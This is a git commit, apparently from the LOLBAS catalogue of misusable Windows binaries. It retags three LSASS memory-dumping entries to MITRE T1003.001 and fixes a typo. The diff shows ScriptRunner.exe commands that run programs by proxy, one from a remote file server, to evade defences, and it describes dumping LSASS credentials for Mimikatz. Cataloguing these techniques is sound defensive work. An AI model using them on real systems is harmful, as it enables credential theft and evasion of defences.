LSASS realign to T1003.001

This commit is contained in:
Wietze 2021-11-05 20:35:58 +00:00
parent df8c88f4ca
commit 2380c506d4
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
4 changed files with 5 additions and 5 deletions

View File

@ -6,14 +6,14 @@ Created: 2018-05-25
Commands:
- Command: Scriptrunner.exe -appvscript calc.exe
Description: Executes calc.exe
Usecase: Execute binary through proxy binary to evade defensive counter measurments
Usecase: Execute binary through proxy binary to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmd from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Dump Lsass.exe process memory to retrieve credentials.
Category: Dump
Privileges: SYSTEM
MitreID: T1003
MitreID: T1003.001
OperatingSystem: Windows
Full_Path:
- Path: c:\windows\system32\comsvcs.dll

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Create memory dump and parse it offline
Category: Dump
Privileges: SYSTEM
MitreID: T1003
MitreID: T1003.001
OperatingSystem: All Windows
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe

View File

@ -16,7 +16,7 @@ Commands:
Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.
Category: Dump
Privileges: Administrator
MitreID: T1003
MitreID: T1003.001
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe